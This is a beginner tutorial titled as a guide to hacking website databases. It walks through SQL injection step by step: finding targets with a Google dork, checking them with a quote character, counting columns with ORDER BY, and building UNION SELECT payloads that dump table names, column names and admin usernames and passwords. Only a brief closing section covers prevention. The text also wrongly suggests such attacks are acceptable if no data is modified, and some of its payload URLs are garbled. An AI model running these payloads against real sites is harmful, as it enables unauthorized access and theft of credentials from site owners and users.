Guide to Hacking Website Database 101

This short instructable will teach you about "SQL Injection", how to do it, and how to prevent it
WARNING: IM NOT RESPONSIBLE IF YOU GET BANNED/REPORTED

1.What is a SQL Injection?
   A SQL injection is used to attack the security of a website by typing SQL statements to the website to get a badly designed
website dump the database content to the hacker.

2. Is it illegal to do it?
    Of Course! If you found a website that is vulnerable, you have to contact the admin before the website get attack.
But it will be fine if you don't modify, get personal data.

3. So, Why am I teaching How-to-hack?
   My goal is to show you how SQL Injection is easy and very dangerous. If you follow along, you will notice is
NOT time consuming too.

First, We need to find a website that is vulnerable to SQL Injection.

1) Searching for vulnerable Websites

1. Go to http://www.google.com/

2. In the Text box, type in inurl:.php?id=
    => The "inurl" is a command that lets you search the website's URL. 
         Also, .php?id= is a PHP form that makes SQL Injection possible

3. You will see bunch of websites that has the .php?id= form, Click them individually and check if it's vulnerable


2) Check if it's vulnerable to SQL Injection
     Lets say the website you found is http://Vulnerable.com/goodies.php?id=10

The process of checking if it's vulnerable is pretty simple, Just add a quote (') to the end of the website URL.
Your website will be: http://Vulnerable.com/goodies.php?id=10'

If it's vulnerable, it will dump out a MySQL error message like this (or similar):
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


Tips: If the website just loads fine or displays a "404 Page not found" error, That site is not vulnerable

Check the picture above to see some examples

To access the database, we first need to figure out the number of columns.

We are going to use the command called Order by. This command tells database how to order the result.

To use this command, delete the quote (') that you typed before and type in the command order by 1--
The website will be: http://Vulnerable.com/goodies.php?id=10 order by 1--
Now, keep increasing the number until we get a error

Tip: The "--" is a double hyphen/minus symbol

[Here is how it works]
http://Vulnerable.com/goodies.php?id=10 order by 1--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 2--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 3--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 4--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 5--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 6--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 7--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 8--         <= We get no error
http://Vulnerable.com/goodies.php?id=10 order by 9--         <= Bingo! We have error "Unknown column '9' in 'order clause'"

We had a error on the ninth try. So there are 8 columns.

Now we are going to find vulnerable column using a command called "union all select".

Delete all the commands you did earlier and type in union all select 1,2,3,4,5,6,7,8--
Before you copy & paste that code in, you need to make few adjustments to the number. For example,
If you have 4 columns, the code will be union all select 1,2,3,4--,
and if you have 7 columns, the code will be union all select 1,2,3,4,5,6,7-- .  You will get the idea.

If you entered something wrong, Most likely this error will pop out: The used SELECT statements have a different number of columns
If you got this error, You entered the numbers incorrectly.

If everything loads fine, it will display number like 2 or 6. This is the vulnerable column

Tip: If it loads all right, but there are no numbers, try adding "-" (hyphen/minus sign) after the "id=" on your website URL,
your website URL will look like this: http://Vulnerable.com/goodies.php?id=-10 union all select 1,2,3,4,5,6,7,8--
This will hopefully load it up.

Now we need to find the MySQL Version.

Order to get the MySQL version, what you need to do is replace the vulnerable column number (in my case, 2) with version()

So if the vulnerable column is 2, then the complete command/URL will be:
http://Vulnerable.com/goodies.php?id=10 union all select 1,version(),3,4,5,6,7,8

If it displays the version like the picture above, then your good to go. (this step maybe the easiest step)

Now we are going to access the database and pull out some table names.

Okay now we are going to start pulling out some data. First, delete the version() command and
replace that command with group_concat(table_name) and add some commands so your web address (URL)
will look like this:

http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables--

Now when you hit Enter on your keyboard, Your website will display bunch of table names like the picture above.
Now find the table name that has "admin" in it. This table will includes Admin Username/Password.

Once you got the table name, Proceed to next step

To see the columns, we need to convert our  Admin Table name (In my case, nifty_admin) to Hexadecimal Characters.

To convert our Table name to Hexadecimal characters, Go to this website.
Once the Tool loads, Delete everything inside the Text box and paste in the Admin Table name and click Convert

The tool will convert the text into Hexadecimal Characters. Copy the text that is below the word  Hex: (Check the picture above)

Since we now have our Hexadecimal-Converted-Characters, We can finally get the column names.

Go back to your webpage, and replace all the table/s to column/s,
also at the end, add the command where table_name=0x*Hex*<= replace *Hex* with your converted Hexadecimal Characters
Your Web Address will now look like this:

http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x6e696674795f61646d696e--

When you hit Enter, The page will display columns like the picture above, Find the column names of Username and Password
(In my case, The column name of Username was admin, and the column name of Password was pass)

Now we are going to find the Username and Password

This is the final Stage, Delete the commands that is Bold:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name=0x6e696674795f61646d696e--

Here is the Web Address you are left with:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(),3,4,5,6,7,8 from

Now, between the brackets from the command group_concat(), Type in the following words:
*Username_Column*, 0x20616e6420, *Password_Column*

Make sure to replace *Username_Column* with your Username Column Name and the *Password_Column* with your Password Column Name  (In my case, admin is the username column name and the pass is the password column name)

Your web address will now look something like this:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(*Username_Column*, 0x20616e6420, *Password_Column*),3,4,5,6,7,8 from

Now we are going to display the Username & Password

Once you typed in *Username_Column*, 0x20616e6420, *Password_Column* between the group_concat brackets,
We now have to add the Host Table name.

After the command from , Type in your Admin Table name that you got in Step 5. (In my case, My Admin Table name is nifty_admin)
Make sure you type the Admin Table name in English,NOT Hexadecimal Characters.

Now the Complete Web Address will finally look like this:
http://Vulnerable.com/goodies.php?id=-1/buy.php?Id=-1 union select 1,group_concat(*Username_Column*, 0x20616e6420, *Password_Column*),3,4,5,6,7,8 from *Admin_Table_Name*
Make Sure you replace *Admin_Table_Name* with your Admin Table Name along with *Username_Column*, *Password_Column*

If you hit Enter, You will see Username and Password like the picture above,
Congratulations! You've successfully hacked into MySQL Database!

Note: The Username & Password you see above are OUTDATED, They wont work.

Now we learned the basic principle of SQL Injecting,Now lets prevent it.

Here is some few basic blocking Techniques & Tips you can use on your SQL code:

1. Install the GreenSQL database firewall.
GreenSQL is an open source database firewall that can automatically block the commands load_file and INTO OUTFILE
By default, GreenSQL blocks administrative and sensitive SQL commands. In addition, GreenSQL prevents SQL injections by calculating the risk of each query and blocking queries with high risk. For example, the UNION token and SQL comments are taken into account. Check the application website for more information: GreenSQL

2. Do not use MySQL root user to access the database.
Do not use administrative users to access the database. It is recommended that you create a distinct user with hardened permissions to access specific databases.

3. Revoke FILE permission from the MySQL user used in your applications.
mysql> REVOKE FILE ON *.* from 'USER_NAME'@'HOST_NAME';


For More Information, Visit:
SQL Injection Cheat Sheet
MySQL Documentation



Thanks for taking time reading this instructable, God Bless!